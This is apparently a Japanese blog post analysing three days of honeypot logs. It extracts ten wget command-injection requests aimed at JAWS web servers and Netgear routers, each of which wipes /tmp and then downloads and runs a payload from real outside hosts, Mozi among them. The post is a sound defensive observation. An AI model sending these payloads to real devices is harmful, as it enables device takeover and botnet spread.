ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。
しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事によりログ分析ができていませんでした。
そのため、現時点で３日分のログしか溜まっていません（えっ！？

それでも、すでに数千アクセス来ているのでログを見ていこうと思います。

今日は、wgetしてくる攻撃をピンポイントで抽出します。
ログファイルを書きコマンドで抽出します。[1]

$ grep -i wget access_log

結果

検索件数：10件

[2022-03-15 13:14:01+0900] 114.226.253.242 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：中国

[2022-03-15 14:34:46+0900] 203.150.51.169 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：タイ

[2022-03-16 06:10:01+0900] 131.0.140.63 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：アメリカ（国情報なし）

[2022-03-16 15:57:33+0900] 124.152.185.167 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：中国

[2022-03-16 17:58:34+0900] 189.124.119.77 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：アメリカ（国情報なし）

[2022-03-16 18:39:56+0900] 41.237.6.136 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：エジプト

[2022-03-17 09:28:28+0900] 41.44.63.246 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：エジプト

[2022-03-17 15:03:33+0900] 45.224.170.52 blank:80 "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.224.170.52:57274/Mozi.m+-

ipアドレスの国：アメリカ（国情報なし）

[2022-03-17 18:09:42+0900] 187.144.73.98 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

 ipアドレスの国：メキシコ

[2022-03-17 19:15:47+0900] 106.253.189.123 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：韓国

ipアドレスの国を調べるとさまざまな国から攻撃を受けています。
中国、アメリカ、アフリカ、タイ、韓国とバラエティに富んでいます。
今回の攻撃は、wgetでマルウェアかなんかをダウンロードして仕込もうとしています。
wgetの前に必ずcd+/tmp;rm+-rf+*;があるのは、アタックした痕跡を消しにかかっています。
ここらへんはもうテンプレの攻撃でしょうね。
しかも、wgetにはjawsの文字列が必ずあります。
これはHTTPのコマンドインジェクションのようです。[2]

こんな感じでハニーポットのログ分析で攻撃の観測をレポートしていきます。

 

参考記事

[1] grepコマンドの詳細まとめました【Linuxコマンド集】

[2]複数の脆弱性を利用してルータやデバイスを狙うボット型マルウェアの新亜種を確認 | トレンドマイクロ セキュリティブログ

 

ハニーポット関連書籍

ハニーポットを作ってみたい場合は下記書籍を参考にすると良いと思います。